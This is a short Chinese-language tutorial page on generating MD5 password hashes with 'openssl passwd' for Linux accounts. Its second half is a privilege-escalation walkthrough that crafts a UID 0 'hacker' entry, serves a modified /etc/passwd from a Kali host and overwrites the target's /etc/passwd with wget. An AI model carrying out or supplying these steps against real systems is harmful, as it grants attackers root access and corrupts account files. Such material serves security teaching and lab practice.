openssl passwd 手动生成密码 | 您所在的位置:网站首页 › password123是什么意思 › openssl passwd 手动生成密码 |
参考:https://www.cnblogs.com/liushuhe1990/articles/12298749.html 引言:在Linux系统中我们要向手动生成一个密码可以采用opensll passwd来生成一个密码作为用户账号的密码。Linux系统中的密码存放在/etc/shadow文件中,并且是以加密的方式存放的,根据加密方式的不同,所产生的加密后的密码的位数也不同。 openssl passwd的作用是用来计算密码hash的,目的是为了防止密码以明文的形式出现。 语法格式:openssl passwd [option] passwd openssl passwd常用的选项如下: -1:表示采用的是MD5加密算法。 -salt:指定salt值,不使用随机产生的salt。在使用加密算法进行加密时,即使密码一样,salt不一样,所计算出来的hash值也不一样,除非密码一样,salt值也一样,计算出来的hash值才一样。salt为8字节的字符串。 示例:[tom@localhost ~]$ openssl passwd -1 -salt ‘12345678’ ##注意‘12345678’不是密码而是密码的长度 Password: ##这里输入的是密码 $1$12345678$1qWiC4czIc07B4J8bPjfC0 ##这是生成的密文密码 ##将生成的密码串,手动添加到/etc/shadow中就可用作用户的登陆密码了。 passwd提权1.通过OpenSSL passwd生成一个新的用户hacker,密码为123456 openssl passwd -1 -salt hacker 123456 $1$hacker$4o50Z4aoUGaLMC0Rg4Io402.将其追加到kali的/etc/passwd文件中 将hacker:$1$hacker$4o50Z4aoUGaLMC0Rg4Io40:0:0:/root:/bin/bash追加到passwd中 3.在Kali上启动一个python服务器 python -m SimpleHTTPServer 8000 4.将Kali上的passwd文件下载到靶机etc目录下并覆盖原来的passwd文件 wget http://192.168.0.1/passwd -O /etc/passwd 5.然后切换到hacker用户即可 |
CopyRight 2018-2019 实验室设备网 版权所有 |